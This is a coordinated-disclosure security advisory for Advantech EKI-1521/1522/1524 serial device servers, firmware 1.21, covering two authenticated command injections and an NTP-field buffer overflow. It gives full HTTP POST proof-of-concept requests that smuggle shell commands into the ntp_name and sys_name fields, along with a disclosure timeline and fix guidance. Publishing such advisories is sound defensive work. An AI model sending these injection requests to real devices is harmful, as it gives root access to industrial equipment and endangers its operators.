<pre><code>CyberDanube Security Research 20230511-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series<br /> vulnerable version| 1.21<br /> fixed version| 1.24<br /> CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575<br /> impact| High<br /> homepage| https://advantech.com<br /> found| 2023-03-06<br /> by| S. Dietz, T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Advantech’s corporate vision is to enable an intelligent planet. The company<br />is a global leader in the fields of IoT intelligent systems and embedded<br />platforms. To embrace the trends of IoT, big data, and artificial intelligence,<br />Advantech promotes IoT hardware and software solutions with the Edge<br />Intelligence WISE-PaaS core to assist business partners and clients in<br />connecting their industrial chains. Advantech is also working with business<br />partners to co-create business ecosystems that accelerate the goal of<br />industrial intelligence."<br /><br />Source: https://www.advantech.com/en/about<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />EKI-1524-CE series / 1.21<br />EKI-1522-CE series / 1.21<br />EKI-1521-CE series / 1.21<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)<br />The web server of the device is prone to two authenticated command injections.<br />These allow an attacker to gain full access to the underlying operating system<br />of the device. This device class can be attached to legacy systems via RS-232,<br />RS-422 or RS-485. Such peripheral systems can be affected by attacks to the<br />device from malicious actors.<br /><br />2) Buffer Overflow (CVE-2023-2575)<br />The web server is prone to a buffer overflow, triggered due to missing input<br />lenght validation in the NTP input field. According to the vendor, the NTP<br />server string is expected to be 64 bytes long, which is not correctly checked.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server is prone to two authenticated command injections via POST<br />parameters. The following proof-of-concepts show how to inject commands to the<br />system which gets executed with root permissions in the background:<br /><br />1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)<br />The following POST request executes the command “;ping 10.0.0.1” on the system:<br />===============================================================================<br />POST /cgi-bin/index.cgi?func=setsys HTTP/1.1<br />Host: 172.16.0.100<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 541<br />Origin: http://172.16.0.100<br />Connection: close<br />Referer: http://172.16.0.100/cgi-bin/index.cgi<br /><br />web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80<br /><br />===============================================================================<br />It is also possible to execute this command without any interceptor proxy by<br />enclose it with ";", which results in the string “;ping 10.0.0.1;”.<br /><br />1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)<br />The device name can also be abused for command injection. It is only executed<br />on reboot, but this can also be done via the device’s web-interface. A POST<br />request which injects the command “;ls /etc;” can be looks like the following:<br />===============================================================================<br />POST /cgi-bin/index.cgi?func=setsys HTTP/1.1<br />Host: 172.16.0.100<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 541<br />Origin: http://172.16.0.100<br />Connection: close<br />Referer: http://172.16.0.100/cgi-bin/index.cgi<br /><br />web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80<br /><br />===============================================================================<br />Such command can also be injected by setting the device name to “;ls /etc;”.<br /><br /><br />2) Buffer Overflow (CVE-2023-2575)<br />The following POST request can be used to trigger a buffer overflow<br />vulnerability in the web server:<br />===============================================================================<br />POST /cgi-bin/index.cgi?func=setsys HTTP/1.1<br />Host: 172.16.0.97<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 823<br />Origin: http://172.16.0.97<br />Connection: close<br />Referer: http://172.16.0.97/cgi-bin/index.cgi<br /><br />web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80<br />===============================================================================<br /><br />The serial port of the device provides error messages, which already indicate<br />that the stack has been corrupted:<br />/ # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 ***<br />*** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 ***<br /><br />Furthermore, the forked child processes seem to remain in the process list as<br />zombies - three buffer overflows were triggered in this case:<br />/ # ps<br />PID USER COMMAND<br />[...]<br /> 935 root ./index.cgi func=setsys<br /> 959 root ./index.cgi func=setsys<br /> 983 root ./index.cgi func=setsys<br />[...]<br /><br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update the product to the latest available firmware version.<br /><br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Advantech customers to upgrade the firmware to the<br />latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2023-03-08: Contacting Advantech via Service Request form; No answer.<br />2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz);<br /> Vendor confirmed vulnerabilities and will provide a fixed firmware<br /> until 2023-05-13. Asked vendor for affected models; Vendo<br /> responded that EKI-1524/1522/1521 series are affected.<br />2023-03-20: Asked for status update.<br />2023-03-21: Vendor responded that the firmware is currently under testing.<br />2023-03-31: Vendor statet, that firmware is done and sent it via email; Found<br /> additional issues and responded to vendor.<br />2023-04-01: Vendor asked multiple question.<br />2023-04-02: Responded to vendor, answered questions and asked for a call;<br /> Vendor agreed.<br />2023-04-04: Set date for a call to 2023-04-10.<br />2023-04-10: Clarified further issues.<br />2023-04-23: Vendor sent notification that a beta release of the firmware is<br /> available.<br />2023-05-02: Vendor sent notification that a new firmware release is online.<br />2023-05-04: Asked vendor if the advisory can be published earlier than agreed.<br />2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities<br /> have been fixed.<br />2023-05-11: Coordinated release of security advisory.<br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF S. Dietz, T. Weber / @2023<br /><br /><br /></code></pre>